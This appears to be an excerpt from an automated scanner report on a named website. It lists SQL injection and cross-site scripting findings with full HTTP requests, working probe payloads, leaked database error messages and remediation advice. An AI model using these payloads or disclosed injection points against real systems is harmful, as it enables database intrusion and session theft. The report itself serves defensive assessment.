1. SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the
backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
{PRODUCT} identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as
normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
{PRODUCT} confirmed the vulnerability by executing a test SQL query on the backend database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of
attacks successfully:
Reading, updating and deleting arbitrary data or tables from the database
Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational
mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy
code to use these new libraries.)
4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern
languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be
noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheatsheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
1.1. /contact/ CONFIRMED
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST convert(int,
(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50
)+CHAR(100)+CHAR(105)+CHAR(108)+CHA
R(101)+CHAR(109)+CHAR(109)+CHAR(97))
)
phone POST 3
sendFrom POST 3
subject POST 3
11 / 146
Extracted Data
microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition on
windows nt 5.2 (build 3790: service pack 2)
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 258
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,
(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response

"Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e07'</font><p><font face="Arial" size=2>Conversion failed when converting the
varchar value '_!@2dilemma' to data type int.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</font>
12 / 146
9 TOTAL
CRITICAL
2. [Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the
backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even
though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to
confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also
consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
{PRODUCT} identified a probable SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the
backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Even though {PRODUCT} believes there is a SQL injection in here, it could not confirm it. There can be numerous reasons for {PRODUCT} not being able to
confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also
consider sending the details of this issue to us so we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of
attacks successfully:
Reading, updating and deleting arbitrary data/tables from the database.
Executing commands on the underlying operating system.
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of
s DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries
and this can solve many if not all SQL injection based problems.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy
code to use these new libraries.)
4. Monitor and review weblogs and application logs to uncover active or previous exploitation attempts.
Remedy
A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all
modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be
noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat Sheet
Remedy References
SQL injection Prevention Cheat Sheet
MSDN - Protect From SQL injection in ASP.NET
OWASP Preventing SQL injection in Java
Prepared Statements and Stored Procedures in PHP
Classification
OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
13 / 146
2.1. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(select
count(*),concat(CONCAT(CHAR(95),CHAR(3
3),CHAR(64),CHAR(52),CHAR(100),CHAR(10
5),CHAR(108),CHAR(101),CHAR(109),CHAR(
109),CHAR(97)),0x3a,floor(rand()*2))x
from (select 1 union select 2)a group by x
limit 1))
subject POST 3
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 438
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-
1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon

14 / 146
2.2. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST -1 or 1=1 and (select 1 and row(1,1)>(select
count(*),concat(CONCAT(CHAR(95),CHAR(3
3),CHAR(64),CHAR(52),CHAR(100),CHAR(10
5),CHAR(108),CHAR(101),CHAR(109),CHAR(
109),CHAR(97)),0x3a,floor(rand()*2))x
from (select 1 union select 2)a group by x
limit 1))
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 434
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-
1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon

15 / 146
2.3. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST (select
convert(int,CHAR(95)+CHAR(33)+CHAR(64)
+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns)
sendFrom POST 3
subject POST 3
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 289
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=
(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subjec
t=3
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon

16 / 146
2.4. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST -1 or 1=1 and (select 1 and row(1,1)>(select
count(*),concat(CONCAT(CHAR(95),CHAR(3
3),CHAR(64),CHAR(52),CHAR(100),CHAR(10
5),CHAR(108),CHAR(101),CHAR(109),CHAR(
109),CHAR(97)),0x3a,floor(rand()*2))x
from (select 1 union select 2)a group by x
limit 1))
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 438
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-
1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon

17 / 146
2.5. /reg/
http://www.shalomlaam.co.il/reg/
Parameters
Parameter Type Value
action POST add
bpdf POST 1
btn1 POST
email POST (select
convert(int,CHAR(95)+CHAR(33)+CHAR(64)
+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns)
f_name POST Smith
name POST Smith
phone POST 3
radio POST alon
Certainty
Request
POST /reg/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/reg/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 270
Accept-Encoding: gzip, deflate
action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=
(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name
=Smith&phone=3&radio=alon
Response

yle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;"></td></tr></table><br><br></td></tr></table>


<p class="text_ratz_bold">&nbsp;</p>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/reg/Default.asp</font><font face="Arial" size=2>, line 28</font>
2.6. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST -1 or 1=1 and (select 1 and row(1,1)>(select
count(*),concat(CONCAT(CHAR(95),CHAR(3
3),CHAR(64),CHAR(52),CHAR(100),CHAR(10
5),CHAR(108),CHAR(101),CHAR(109),CHAR(
109),CHAR(97)),0x3a,floor(rand()*2))x
from (select 1 union select 2)a group by x
limit 1))
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
18 / 146
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 434
Accept-Encoding: gzip, deflate
action=contact&f_name=-
1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&nam
e_id=0&phone=3&sendFrom=3&subject=3
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon

2.7. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST %27
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 124
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=%2527&phone=3&sendFrom=3&subject=3
Response

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->


</tr>
</table> <p class="text_2">&nbsp;</p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near '27'.
</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</font>
19 / 146
2.8. /lessons/
http://www.shalomlaam.co.il/lessons/
Parameters
Parameter Type Value
action POST search
yom POST '+ (select
convert(int,CHAR(95)+CHAR(33)+CHAR(64)
+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
Request
POST /lessons/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/lessons/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 220
Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20sysc
olumns)%20%2b'&snif=3&subjects=0
Response

td>
<td width="10" height="5"></td>
</tr>
<tr><td colspan="6">
<table cellpadding="3" cellspacing="3" border="0" dir="ltr">
<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e37'</font><p><font face="Arial" size=2>[Microsoft][ODBC Excel Driver]
The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

2.9. /lessons/default.asp
http://www.shalomlaam.co.il/lessons/default.asp
Parameters
Parameter Type Value
action POST search
yom POST '+ (select
convert(int,CHAR(95)+CHAR(33)+CHAR(64)
+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
Request
POST /lessons/default.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/lessons/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 220
Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20sysc
olumns)%20%2b'&snif=3&subjects=0
20 / 146
Response

td>
<td width="10" height="5"></td>
</tr>
<tr><td colspan="6">
<table cellpadding="3" cellspacing="3" border="0" dir="ltr">
<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e37'</font><p><font face="Arial" size=2>[Microsoft][ODBC Excel Driver]
The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

21 / 146
150 TOTAL
IMPORTANT
CONFIRMED
150
3. Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This
allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by
changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted
as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other
users' session, an attacker might attack an administrator to gain full control over the application.
{PRODUCT} detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on
the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.
Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users'
sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the
output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded
accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-
site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers.
Also note that;
XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should
be reverted back if the browser is actively used other than testing purposes.
Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism
therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt.
Go to folder where chrome.exe is located.
Run the command chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools->Internet Options and then navigate to the Security Tab.
Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
Set it to disabled. Click OK.
Click Yes to accept the warning followed by Apply.
Firefox
Go to about:config in the URL address bar.
In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
Set its value to false by double clicking the row.
Classification
OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
22 / 146
3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001D1)</script>
Request
GET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:00 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/allvideo/'"--></style></script><script>netsparker(0x0001D1)</script><BR>script><BR>style><<script>netsparker(0x0001D1)<.asp?id=script>
3.2. /ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00062A)</script>
Request
GET /ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00062A)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:07:40 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/'"--></style></script><script>netsparker(0x00062A)</script><BR>script><BR>style><<script>netsparker(0x00062A)<.asp?id=script>
3.3. /contact/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/contact/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x000..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
Query Based Query String '"--></style></script>
<script>alert(0x00049B)</script>
23 / 146
Request
POST /contact/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x00049B)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
